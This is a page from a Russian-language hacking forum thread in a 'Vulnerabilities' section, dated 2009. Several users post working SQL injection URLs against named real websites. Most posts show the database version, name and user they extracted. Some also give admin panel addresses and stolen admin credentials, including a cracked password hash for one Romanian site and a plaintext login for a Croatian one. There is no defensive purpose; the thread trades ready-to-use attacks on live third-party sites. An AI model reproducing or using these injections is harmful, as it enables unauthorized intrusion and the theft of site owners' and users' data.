ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7701  
Старый 08.02.2009, 16:36
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

commencementflowers.com - PR3
Код:
http://www.commencementflowers.com/flowers_catalog/index.php?id=fuck%27+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
Version: 4.0.24-standard-log
User: convflow@10.105.0.6
DB name: convflow

Админка:
Код:
http://www.commencementflowers.com/flowers_catalog/admin/
Но к сожалению или к счастью basic авторизация =)
 
Ответить с цитированием

  #7702  
Старый 08.02.2009, 17:33
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.birdsinbulgaria.org/news.php?id=-1+union+select+1,concat_ ws(0x 3a,version(),data  base(),user()),3,4,5,6--
Database Version: 5.0.51
Database name: birdsinbulgaria
User name:birdsinbulgaria@localhost

Код:
http://www.eotepic.org/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,vers ion(),database(),user ()),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
Database Version: 5.0.67
Database name: eot_pacibirdsinbulgaria
User name: eot-web2@hemlock.ncsa.uiuc.edu

Последний раз редактировалось f1ng3r; 08.02.2009 в 17:58..
 
Ответить с цитированием

  #7703  
Старый 08.02.2009, 18:44
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ecazari.ro/cazare/index.php?pid=-1531+UNION+SELECT+concat_ws(0x3a,version(),databas e(),user()),2--%20&user=det


Database Version: 4.1.22-standard-log
Database name: rent4all_cazari
User name: rent4all_cazari@localhost



http://www.ecazari.ro/cazare/index.php?pid=-1531+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT _WS(0x3a,email,id,name,password,user),0x71),0x71)+ FROM+admin+LIMIT+0,1-- &user=det

::1::e7f7c6d0dd34536e5ad587c201ba7aef:admin

pass cracked by OMG xteog300
 
Ответить с цитированием

  #7704  
Старый 08.02.2009, 18:45
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

Код:
http://www.thrashermagazine.com/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--%20%20
Код:
http://www.slapmagazine.com/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),  email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
 
Ответить с цитированием

  #7705  
Старый 08.02.2009, 19:34
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

http://www.leaguexbox.fr - PR: 4

Код:
http://www.leaguexbox.fr/main_pages/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),datab ase(),user()) ,5,6,7,8, 9,10,11,12,13,14--
Database Version : 5.0.44
Database name : leaguexb
User name : leaguexb@localhost

Последний раз редактировалось f1ng3r; 08.02.2009 в 21:21..
 
Ответить с цитированием

  #7706  
Старый 08.02.2009, 20:42
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
Cool

http://www.bellarosa.by/guest.php?PagID=-999999+union+select+1,user(),version(),database(), concat_ws(0x3a,LOGIN,PASS)+from+br_users/*
 
Ответить с цитированием

  #7707  
Старый 08.02.2009, 20:47
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.erachicco.ro/products.php?pid=36[SQL]&pager=9

Version : 4.1.22-standard-log
DataBase:erachico_erachicco
User: erachico@localhost
 
Ответить с цитированием

  #7708  
Старый 08.02.2009, 22:18
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

wol.bz - бесплатный хостинг=)
Цитата:
http://wol.bz/cgi-bin/view.pl?a=list&sid=&l=1&idr=-c10'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conca t_ws(0x3a,user(),database(),version()),14,15,16,17 ,18,19,20,21+--+
юзер - postcards@192.168.1.15
бд - constructor_new
версия MySQL - 4.0.25-standard
 
Ответить с цитированием

  #7709  
Старый 08.02.2009, 22:42
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.cantus.hr/infonaslova.php?id=-36+union+select+1,2,3,4,5,concat_ws(iduser,0x3a,passwd),7+from+admin+limit+1,1
http://www.cantus.hr/admin/ - админка
Логин и пароль - vlasta
Код:
http://www.jk-meridijan.hr/article.php?id=-36+union+select+1,2,3,4,login,password,7,8,9,10,11,12+from+users+limit+1,1

Последний раз редактировалось jokester; 08.02.2009 в 23:10.. Причина: объеденил посты
 
Ответить с цитированием

  #7710  
Старый 09.02.2009, 00:06
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.paradigmmgmt.com/artist_detail.php?id=-1+union+select+1,2,3,concat_ ws(0 x3a,version(),database (),user()),5,6,7,8--
Database Version : 5.0.67
Database name : paradig3_db
User name : paradig3_user@localhost

Последний раз редактировалось f1ng3r; 09.02.2009 в 14:04..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ